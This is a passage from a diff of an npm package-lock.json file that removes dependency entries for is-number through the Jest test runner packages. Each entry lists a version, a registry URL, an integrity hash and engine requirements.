"sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=", - "dev": true - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "dependencies": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-changed-files/node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus/node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "dependencies": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-config/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/jest-config/node_modules/babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/jest-config/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/jest-config/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-config/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-config/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-config/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-leak-detector/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils/node_modules/diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils/node_modules/jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-resolve/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - 